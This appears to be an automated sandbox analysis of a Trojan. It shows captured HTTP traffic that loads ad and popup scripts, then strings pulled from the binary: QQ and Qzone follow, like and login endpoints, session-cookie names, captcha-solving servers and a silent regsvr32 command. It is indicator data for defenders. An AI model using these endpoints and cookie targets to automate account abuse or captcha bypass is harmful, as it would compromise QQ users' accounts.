: 109..Content-Type: text/html..Last-Modified: Fri, 06 Jan 2017 15:11:
53 GMT..Accept-Ranges: bytes..ETag: "f231d0362f68d21:2be"..Server: Mic
rosoft-IIS/6.0..Date: Tue, 20 Jun 2017 01:37:06 GMT...................
...................,..........5.2................................,....
..........................

GET /ad/qqkjz11.htm HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: 123.51pc114.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 813

Content-Type: text/html

Last-Modified: Mon, 16 Jan 2017 15:57:38 GMT

Accept-Ranges: bytes

ETag: "8613f6421170d21:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>........................<script language="javascript" ty
pe="text/javascript" src="hXXp://js.users.51.la/19059730.js"></s
cript>..<noscript><a href="hXXp://VVV.51.la/?19059730" tar
get="_blank"><img alt="我要啦免费&
#x7EDF;计" src="hXXp://img.users.51.la/19059730.asp" style="bord
er:none" /></a></noscript>..</body>..</html>
;......


GET /ad/mcgg.htm HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: 123.51pc114.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 75

Content-Type: text/html

Last-Modified: Thu, 28 Mar 2013 03:33:01 GMT

Accept-Ranges: bytes

ETag: "8222f3642bce1:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:06 GMT
<meta HTTP-EQUIV=REFRESH CONTENT="0;URL=hXXp://ad.7532.com/ad/mcgg4
56.htm">....


GET /ad/qqkjzgg1.htm HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: 123.51pc114.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 2922

Content-Type: text/html

Last-Modified: Fri, 06 Jan 2017 15:13:44 GMT

Accept-Ranges: bytes

ETag: "46c78b782f68d21:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>.. <br />..<font  size="2" color="red"><a hr
ef="hXXp://url.cn/OGLodN"  target="_blank">................28......
............:</a></font><font  size="2" color="red">
....<br />..<font  size="2" color="blue"><a href="http:
//km.7532.com"  target="_blank">............1-3........1........10.
.4..................1-10......................7532......</a><
/font><font  size="2" color="blue"><br />..<br />
..<a href="hXXp://VVV.7532.com/" target="_blank" ..style="color:#00
00ff"><strong>..<br />.................................
.........5.2................................,.........................
.</strong></a>..<br />..<a href="hXXp://VVV.7532.
com/" target="_blank" ..style="color:#ff0000"><strong>.......
.<br />..<br />..1........................................
..................<br />..2.....................................
............................</strong></a>....<br /&<<< skipped >>>

GET /4473463.js HTTP/1.1

Accept: */*

Referer: hXXp://ad.7532.com/ad/mcgg456.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: js.users.51.la

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Encoding: gzip

Last-Modified: Tue, 07 Mar 2017 05:56:02 GMT

Accept-Ranges: bytes

ETag: "6117d580797d21:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/8.5

Date: Tue, 20 Jun 2017 01:39:02 GMT

Content-Length: 977
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"f.t........<...q........m.zt
...................z............Rf...w...g.Q..Y......g.w.....C....>
..p...~>8}.?......N.=.....#......O~......]~|..7N..:..TK...-....G..g
....[4..........4k.j.}w.....#...v.V...T.:.6..z..._....U.4k..;..iUV5...
..2.,......j."[..}....m..*.../.^h.u./...]^>.W.....y..i.....~......Q
..V..`...d:....b..j....../X...p.i...@E.vZUo.|... ......j.....g.;..y...
.._...W.E.|..........u.3......9....o.-.ey...}.n.^M~.l....i.e.........d
...*O.....M..).....I@..;.|..-.........x>....G...U.I...*k...=......2
...._.y........?.Z.....Vq..h.J:.`._.....R....*.Z...w~...%.>2..9.%..
&Z.......AO...$.........=.$.t.!a5..Qm..Y._.I.@.8...6.........N2.......
.V.`..Z./.~..j}.d..X...6....i......z.......x..u.....g...h...g.~!......
... ..K?.....|....T..>.....gf......4.[w.~.s.mY/Qcn................O
>....yq1GWF.P.\X..T..}.t.....K`M_.g.?...8!..{.n.>....E.Y.9:[.@.i
.p..........;......sP...HTTP/1.1 200 OK..Content-Type: application/jav
ascript..Content-Encoding: gzip..Last-Modified: Tue, 07 Mar 2017 05:56
:02 GMT..Accept-Ranges: bytes..ETag: "6117d580797d21:0"..Vary: Accept-
Encoding..Server: Microsoft-IIS/8.5..Date: Tue, 20 Jun 2017 01:39:02 G
MT..Content-Length: 977...............`.I.%&/m.{.J.J..t...`.$..@......
...iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"f.t...
.....<...q........m.zt...................z............Rf...w...g.Q.
.Y......g.w.....C....>..p...~>8}.?......N.=.....#......O~...<<< skipped >>>

GET /1435675/tongji.js HTTP/1.1

Accept: */*

Referer: hXXp://ad.7532.com/ad/mcgg456.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: js.tongji.linezing.com

Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable

Server: Tengine

Content-Length: 0

Connection: keep-alive

Via: cache8.l2hk1[0,503-0,M], cache20.l2hk1[10013,0], cache9.de1[10518,503-0,M], cache4.de1[30000,10520,504001]

Age: 0

X-Cache: MISS TCP_MISS dirn:-2:-2

X-Swift-SaveTime: Tue, 20 Jun 2017 01:39:15 GMT

X-Swift-CacheTime: 1

Timing-Allow-Origin: *

EagleId: c31b1fcc14979227154668097e

HTTP/1.1 503 Service Temporarily Unavailable..Server: Tengine..Content
-Length: 0..Connection: keep-alive..Via: cache8.l2hk1[0,503-0,M], cach
e20.l2hk1[10013,0], cache9.de1[10518,503-0,M], cache4.de1[30000,10520,
504001]..Age: 0..X-Cache: MISS TCP_MISS dirn:-2:-2..X-Swift-SaveTime: 
Tue, 20 Jun 2017 01:39:15 GMT..X-Swift-CacheTime: 1..Timing-Allow-Orig
in: *..EagleId: c31b1fcc14979227154668097e..

GET /ad/qqkjz12.htm HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: 123.51pc114.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 1273

Content-Type: text/html

Last-Modified: Fri, 09 Dec 2016 13:25:25 GMT

Accept-Ranges: bytes

ETag: "8efaa5b31f52d21:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>......<script language='javascript'>..// ............
......html............var random = {...ad_num : 3,...init : function()
{....n = (Math.floor(Math.random()*random.ad_num 1));....switch(n){...
..case 1:......document.writeln('<script src=\"http:\/\/p.rhgw.net\
/code\/popjs.asp?pid=258920\" charset=\"gb2312\"><\/script>')
;.....break;.....case 2:......document.writeln('<script type=\"text
\/javascript\" src=\"http:\/\/popup.jointreport-switch.com\/close.php?
uid=1130\"><\/script>');.....break;.....case 3:......document
.writeln('<script language=\"javascript\" src=\"http:\/\/u291014.77
8669.com\/fclose.php?id=180495\"><\/script>');.....break;....
}...}..}..random.init();..</script>....<script language="java
script" src="hXXp://u291014.778669.com/fclose.php?id=152695"></s
cript>......................</body>..</html>....
..
<<< skipped >>>

GET /setup/kjkjz1.htm HTTP/1.1

Referer: hXXp://123.51pc114.cn/setup/kjkjz1.htm

Accept: */*

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: 123.51pc114.cn

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Length: 3

Content-Type: text/html

Last-Modified: Fri, 02 Jun 2017 07:26:22 GMT

Accept-Ranges: bytes

ETag: "2da238971dbd21:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:07 GMT

5.9HTTP/1.1 200 OK..Content-Length: 3..Content-Type: text/html..Last-M
odified: Fri, 02 Jun 2017 07:26:22 GMT..Accept-Ranges: bytes..ETag: "2
da238971dbd21:2be"..Server: Microsoft-IIS/6.0..Date: Tue, 20 Jun 2017 
01:37:07 GMT..5.9..

GET /go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1497922737308 HTTP/1.1

Accept: */*

Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: web.users.51.la

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 20 Jun 2017 01:38:55 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 0

Content-Type: text/html

Expires: Mon, 19 Jun 2017 08:58:55 GMT

Cache-control: private

HTTP/1.1 200 OK..Date: Tue, 20 Jun 2017 01:38:55 GMT..Server: Microsof
t-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 0..Content-Type: tex
t/html..Expires: Mon, 19 Jun 2017 08:58:55 GMT..Cache-control: private
......

GET /go.asp?svid=3&id=4473463&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://ad.7532.com/ad/mcgg456.htm&vvtime=1497922757853 HTTP/1.1

Accept: */*

Referer: hXXp://ad.7532.com/ad/mcgg456.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: web.users.51.la

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 20 Jun 2017 01:39:15 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 0

Content-Type: text/html

Expires: Mon, 19 Jun 2017 08:59:15 GMT

Cache-control: private

HTTP/1.1 200 OK..Date: Tue, 20 Jun 2017 01:39:15 GMT..Server: Microsof
t-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 0..Content-Type: tex
t/html..Expires: Mon, 19 Jun 2017 08:59:15 GMT..Cache-control: private
..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3188:

.text

`.rdata

@.data

.rsrc

t%SVh

t$(SSh

~%UVW

O h8%d

u$SShe

wininet.dll

kernel32.dll

ole32.dll

SkinH_EL.dll

advapi32.dll

user32.dll

dc.dll

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

MsgWaitForMultipleObjects

ReportError

WebBrowser

O;.lQ5"

ytv%c]`

?hXXp://ad.51pc114.cn/setup/ssxczgg2269.txt

hXXp://VVV.7532.com/thread-145964-1-1.html

122.228.204.12

hXXp://blog.sina.com.cn/s/blog_81b5163c0102vw7z.html

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

https

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

hXXp://

0@hXXp://123.51pc114.cn/ad/ssggd1.htm

Adodb.Stream

fJ.WM_

CX%xm

Õ6m*

n.BjCw

%s;7*

0%x@w

%C^L:

%s T5

]E4%F(

.Funr

k%UPp

fg.VG

%C',@

>Ùd

0'.Ll

[I(3/#N0.bd

j"%u=w

q%Xn`

@|H.NI

.wdd!

S|%u4

*.Ea]S

Q.CGo

fTpe

.LLbX

-.Mdl

\-A}=3K

Y:.akpS

$.Zcqn

.WE= T!N

#?%s(C(

u.Jck~

zx/%FN[

%s=\RI

}j%c%Y)

Rx.GR

4o#.dM

IeS`%C

[n 4\.UY

,4.qO,

gQ'.Io

%cLur?

s%DHB

]I%%X

5r.US

:mD].tB

f%fUZ

.fOuV12

*_.dC

&-N}<

({?.cQm

.Cqx~c

.`.Qw

**.dU

!n]%x

%X,Cr

&.PFy{xh

.um ZZE7L

/^p%u$

I.NoQY

zu.ew

D/.nT

b\SkinH_EL.dll

C$%cmb

.ppM|

 aZ.mO

%-^

.hk;~

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

51pc114.cn

123.51pc114.cn

hXXp://123.51pc114.cn/setup/kjkjz1.htm

Www.7532.com

hXXp://qlogo2.store.qq.com/qzone/

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

8926356713

hXXp://api.t.qq.com/qzApp/appHomePage.php?index=1&home=1&apiType=5&g_tk=

hXXp://z.t.qq.com/mb/qzone/index.html

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

"loginedUser"

MSXML2.ServerXMLHTTP.6.0

MSXML2.ServerXMLHTTP.5.0

application/x-www-form-urlencoded

hXXp://api.t.qq.com/old/follow.php

hXXp://api.t.qq.com/proxy.html

hXXp://z.t.qq.com/mb/qzone/index.html#

&veriCode=&lieuId=&apiType=5&apiHost=http://api.t.qq.com&g_tk=

&apiType=5&apiHost=http://api.t.qq.com&_r=

hXXp://api.t.qq.com/qzApp/appUserTweets.php?filter=0&uid=

hXXp://api.t.qq.com/old/unfollow.php

hXXp://ad.51pc114.cn/setup/yinyue.html

.html

hXXp://y.qq.com/y/static/singer/

&loginUin=

hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_add.fcg?singermid=

hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_getnum.fcg?singermid=

hXXp://user.qzone.qq.com/p/g/fcg-bin/cgi_emotion_list.fcg?uin=

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: user.qzone.qq.com

Referer: hXXp://user.qzone.qq.com/

X-Real-Url: hXXp://g.qzone.qq.com/fcg-bin/cgi_emotion_list.fcg?uin=

hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=

&zb_url=http://i.gtimg.cn/qzone/space_item/pre/1/1_1.gif

&curkey=http://user.qzone.qq.com/

&unikey=http://user.qzone.qq.com/

/?t=0.11051907816539691&appid=7030&face=0&fupdate=1&from=1&query_count=200&opuin=

qzreferrer=http://user.qzone.qq.com/

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

hXXp://VVV.7532.com

hXXp://VVV.7532.com/forum-49-1.html

mailto:shenglin_yu@126.com

hXXp://ad.51pc114.cn/setup/a.html

regsvr32 /s winhttp.dll

WinHttp

hXXp://123.51pc114.cn/setup/QQljz1.html

\dc.dll

@.reloc

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

MFC42.DLL

KERNEL32.dll

GdiplusShutdown

gdiplus.dll

WSOCK32.dll

MSVCP60.dll

ReportError_A

VBYB_ReportError

VB_ReportError

uu_loginA

uu_loginW

uu_reportError

debug.ini

ReportError:%s

Error:%s

%s|!|%s

\dms.pdb

%u%u,

dclog.txt

config.ini

port

settimeout:%d

[%d]%s

reg2:%s

checkok:%s %s

check fail:%s %s %s

check:%s %s

getcjfail:%s %s

getcj:%s %s

%s%uout

%s%uin

put img ok:%s

put img fail:%s

put img:%s %s %d

get result ok:%s,%s

get result fail:%s

get result:%s

notifyfail ok:%s

%s\%d-%s.png

notifyfail fail:%s,%s

notifyfail:%s

getimgok:%s,%s

getimg:%s

getinfo fail:%s

getinfo:%s,%s

setresult:%s,%s

HTTP/1.1 200 OK

recv:%d

send:%d

GET /ip.txt HTTP/1.1

Host: %s

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2

select:%d

ioctlsocket:%d

socket:%d

api.qqchaoren.net

14.17.65.24

14.17.65.23

dama2.qqchaoren.net

dama1.qqchaoren.net

connect total:%s %d

:%s %d

connect discard:%s %d

[d-d-d d:d:d](u)

recv timeout:<%d>

recvfail:<%d>%d

server close:<%d>%d

recv:<%d>%d

send:<%d>%d

sendfail:<%d>%d

connect timeout:<%d>

connectok:<%d>%s %hu

127.0.0.1

1.1.3

p_skey=;

airkey=;

&appid=549000912&js_ver=10135&js_type=1&login_sig=&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.

hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=

hXXp://captcha.qq.com/cap_union_new_getsig?aid=549000912&asig=&captype=&clientype=2&disturblevel=&apptype=2&curenv=inner&noBorder=noborder&showtype=embed&uid=

hXXp://captcha.qq.com/getimgbysig?clientype=2&uin=

hXXp://captcha.qq.com/cap_union_verify?aid=549000912&uin=

var window=window||{};$=window.$||{};$pt=window.$pt||{};$pt.RSA=function(){function g(z,t){return new ar(z,t)}

function ah(aA,aB){var t='';var z=0;while(z aB<aA.length){t =aA.substring(z,z aB) '\n';z =aB}

return t aA.substring(z,aA.length)}

function r(t){if(t<16){return'0' t.toString(16)}else{return t.toString(16)}}

function af(aB,aE){if(aE<aB.length 11){uv_alert('Message too long for RSA');return null}

var aD=new Array();var aA=aB.length-1;while(aA>=0&&aE>0){var aC=aB.charCodeAt(aA--);aD[--aE]=aC}

aD[--aE]=0;var z=new ad();var t=new Array();while(aE>2){t[0]=0;while(t[0]==0){z.nextBytes(t)}

function L(){this.n=null;this.e=0;this.d=null;this.p=null;this.q=null;this.dmp1=null;this.dmq1=null;this.coeff=null}

function o(z,t){if(z!=null&&t!=null&&z.length>0&&t.length>0){this.n=g(z,16);this.e=parseInt(t,16)}else{uv_alert('Invalid RSA public key')}}

function W(t){return t.modPowInt(this.e,this.n)}

function p(aA){var t=af(aA,(this.n.bitLength() 7)>>3);if(t==null){return null}

var aB=this.doPublic(t);if(aB==null){return null}

var z=aB.toString(16);if((z.length&1)==0){return z}else{return'0' z}}

L.prototype.doPublic=W;L.prototype.setPublic=o;L.prototype.encrypt=p;var aw;var ai=244837814094590;var Z=((ai&16777215)==15715070);function ar(z,t,aA){if(z!=null){if('number'==typeof z){this.fromNumber(z,t,aA)}else{if(t==null&&'string'!=typeof z){this.fromString(z,256)}else{this.fromString(z,t)}}}}

function b(aC,t,z,aB,aE,aD){while(--aD>=0){var aA=t*this[aC  ] z[aB] aE;aE=Math.floor(aA/67108864);z[aB  ]=aA&67108863}

var navigator=navigator||{};if(Z&&(navigator.appName=='Microsoft Internet Explorer')){ar.prototype.am=ay;aw=30}else{if(Z&&(navigator.appName!='Netscape')){ar.prototype.am=b;aw=26}else{ar.prototype.am=ax;aw=28}}

ar.prototype.DB=aw;ar.prototype.DM=((1<<aw)-1);ar.prototype.DV=(1<<aw);var aa=52;ar.prototype.FV=Math.pow(2,aa);ar.prototype.F1=aa-aw;ar.prototype.F2=2*aw-aa;var ae='0123456789abcdefghijklmnopqrstuvwxyz';var ag=new Array();var ap,v;ap='0'.charCodeAt(0);for(v=0;v<=9;  v){ag[ap  ]=v}

ap='a'.charCodeAt(0);for(v=10;v<36;  v){ag[ap  ]=v}

ap='A'.charCodeAt(0);for(v=10;v<36;  v){ag[ap  ]=v}

function az(t){return ae.charAt(t)}

function A(z,t){var aA=ag[z.charCodeAt(t)];return(aA==null)?-1:aA}

function c(t){var z=h();z.fromInt(t);return z}

function w(aE,z){var aB;if(z==16){aB=4}else{if(z==8){aB=3}else{if(z==256){aB=8}else{if(z==2){aB=1}else{if(z==32){aB=5}else{if(z==4){aB=2}else{this.fromRadix(aE,z);return}}}}}}

this.t=0;this.s=0;var aD=aE.length,aA=false,aC=0;while(--aD>=0){var t=(aB==8)?aE[aD]&255:A(aE,aD);if(t<0){if(aE.charAt(aD)=='-'){aA=true}

aA=false;if(aC==0){this[this.t  ]=t}else{if(aC aB>this.DB){this[this.t-1]|=(t&((1<<(this.DB-aC))-1))<<aC;this[this.t  ]=(t>>(this.DB-aC))}else{this[this.t-1]|=t<<aC}}

aC =aB;if(aC>=this.DB){aC-=this.DB}}

if(aB==8&&(aE[0]&128)!=0){this.s=-1;if(aC>0){this[this.t-1]|=((1<<(this.DB-aC))-1)<<aC}}

this.clamp();if(aA){ar.ZERO.subTo(this,this)}}

function O(){var t=this.s&this.DM;while(this.t>0&&this[this.t-1]==t){--this.t}}

function q(z){if(this.s<0){return'-' this.negate().toString(z)}

var aA;if(z==16){aA=4}else{if(z==8){aA=3}else{if(z==2){aA=1}else{if(z==32){aA=5}else{if(z==4){aA=2}else{return this.toRadix(z)}}}}}

var aC=(1<<aA)-1,aF,t=false,aD='',aB=this.t;var aE=this.DB-(aB*this.DB)ª;if(aB-->0){if(aE<this.DB&&(aF=this[aB]>>aE)>0){t=true;aD=az(aF)}

while(aB>=0){if(aE<aA){aF=(this[aB]&((1<<aE)-1))<<(aA-aE);aF|=this[--aB]>>(aE =this.DB-aA)}else{aF=(this[aB]>>(aE-=aA))&aC;if(aE<=0){aE =this.DB;--aB}}

function R(){var t=h();ar.ZERO.subTo(this,t);return t}

function al(){return(this.s<0)?this.negate():this}

return this.DB*(this.t-1) j(this[this.t-1]^(this.s&this.DM))}

z.t=Math.max(this.t-aA,0);z.s=this.s}

function s(aF,aB){var z=aF%this.DB;var t=this.DB-z;var aD=(1<<t)-1;var aC=Math.floor(aF/this.DB),aE=(this.s<<z)&this.DM,aA;for(aA=this.t-1;aA>=0;--aA){aB[aA aC 1]=(this[aA]>>t)|aE;aE=(this[aA]&aD)<<z}

aB[aC]=aE;aB.t=this.t aC 1;aB.s=this.s;aB.clamp()}

function l(aE,aB){aB.s=this.s;var aC=Math.floor(aE/this.DB);if(aC>=this.t){aB.t=0;return}

var z=aE%this.DB;var t=this.DB-z;var aD=(1<<z)-1;aB[0]=this[aC]>>z;for(var aA=aC 1;aA<this.t;  aA){aB[aA-aC-1]|=(this[aA]&aD)<<t;aB[aA-aC]=this[aA]>>z}

aB.t=this.t-aC;aB.clamp()}

function ab(z,aB){var aA=0,aC=0,t=Math.min(z.t,this.t);while(aA<t){aC =this[aA]-z[aA];aB[aA  ]=aC&this.DM;aC>>=this.DB}

if(z.t<this.t){aC-=z.s;while(aA<this.t){aC =this[aA];aB[aA  ]=aC&this.DM;aC>>=this.DB}

aC =this.s}else{aC =this.s;while(aA<z.t){aC-=z[aA];aB[aA  ]=aC&this.DM;aC>>=this.DB}

aB.s=(aC<0)?-1:0;if(aC<-1){aB[aA  ]=this.DV aC}else{if(aC>0){aB[aA  ]=aC}}

aB.t=aA;aB.clamp()}

function D(z,aB){var t=this.abs(),aC=z.abs();var aA=t.t;aB.t=aA aC.t;while(--aA>=0){aB[aA]=0}

for(aA=0;aA<aC.t;  aA){aB[aA t.t]=t.am(0,aC[aA],aB,aA,0,t.t)}

aB.s=0;aB.clamp();if(this.s!=z.s){ar.ZERO.subTo(aB,aB)}}

function Q(aA){var t=this.abs();var z=aA.t=2*t.t;while(--z>=0){aA[z]=0}

for(z=0;z<t.t-1;  z){var aB=t.am(z,t[z],aA,2*z,0,1);if((aA[z t.t] =t.am(z 1,2*t[z],aA,2*z 1,aB,t.t-z-1))>=t.DV){aA[z t.t]-=t.DV;aA[z t.t 1]=1}}

if(aA.t>0){aA[aA.t-1] =t.am(z,t[z],aA,2*z,0,1)}

aA.s=0;aA.clamp()}

function E(aI,aF,aE){var aO=aI.abs();if(aO.t<=0){return}

var aG=this.abs();if(aG.t<aO.t){if(aF!=null){aF.fromInt(0)}

if(aE!=null){this.copyTo(aE)}

var aC=h(),z=this.s,aH=aI.s;var aN=this.DB-j(aO[aO.t-1]);if(aN>0){aO.lShiftTo(aN,aC);aG.lShiftTo(aN,aE)}else{aO.copyTo(aC);aG.copyTo(aE)}

var aJ=aA*(1<<this.F1) ((aK>1)?aC[aK-2]>>this.F2:0);var aR=this.FV/aJ,aQ=(1<<this.F1)/aJ,aP=1<<this.F2;var aM=aE.t,aL=aM-aK,aD=(aF==null)?h():aF;aC.dlShiftTo(aL,aD);if(aE.compareTo(aD)>=0){aE[aE.t  ]=1;aE.subTo(aD,aE)}

ar.ONE.dlShiftTo(aK,aD);aD.subTo(aC,aC);while(aC.t<aK){aC[aC.t  ]=0}

while(--aL>=0){var aB=(aE[--aM]==aA)?this.DM:Math.floor(aE[aM]*aR (aE[aM-1] aP)*aQ);if((aE[aM] =aC.am(0,aB,aE,aL,0,aK))<aB){aC.dlShiftTo(aL,aD);aE.subTo(aD,aE);while(aE[aM]<--aB){aE.subTo(aD,aE)}}}

if(aF!=null){aE.drShiftTo(aK,aF);if(z!=aH){ar.ZERO.subTo(aF,aF)}}

aE.t=aK;aE.clamp();if(aN>0){aE.rShiftTo(aN,aE)}

if(z<0){ar.ZERO.subTo(aE,aE)}}

function N(t){var z=h();this.abs().divRemTo(t,null,z);if(this.s<0&&z.compareTo(ar.ZERO)>0){t.subTo(z,z)}

function V(t){if(t.s<0||t.compareTo(this.m)>=0){return t.mod(this.m)}else{return t}}

function J(t){t.divRemTo(this.m,null,t)}

function H(t,aA,z){t.multiplyTo(aA,z);this.reduce(z)}

function au(t,z){t.squareTo(z);this.reduce(z)}

K.prototype.convert=V;K.prototype.revert=ak;K.prototype.reduce=J;K.prototype.mulTo=H;K.prototype.sqrTo=au;function B(){if(this.t<1){return 0}

var z=t&3;z=(z*(2-(t&15)*z))&15;z=(z*(2-(t&255)*z))&255;z=(z*(2-(((t&65535)*z)&65535)))&65535;z=(z*(2-t*z%this.DV))%this.DV;return(z>0)?this.DV-z:-z}

function f(t){this.m=t;this.mp=t.invDigit();this.mpl=this.mp&32767;this.mph=this.mp>>15;this.um=(1<<(t.DB-15))-1;this.mt2=2*t.t}

function aj(t){var z=h();t.abs().dlShiftTo(this.m.t,z);z.divRemTo(this.m,null,z);if(t.s<0&&z.compareTo(ar.ZERO)>0){this.m.subTo(z,z)}

function at(t){var z=h();t.copyTo(z);this.reduce(z);return z}

function P(t){while(t.t<=this.mt2){t[t.t  ]=0}

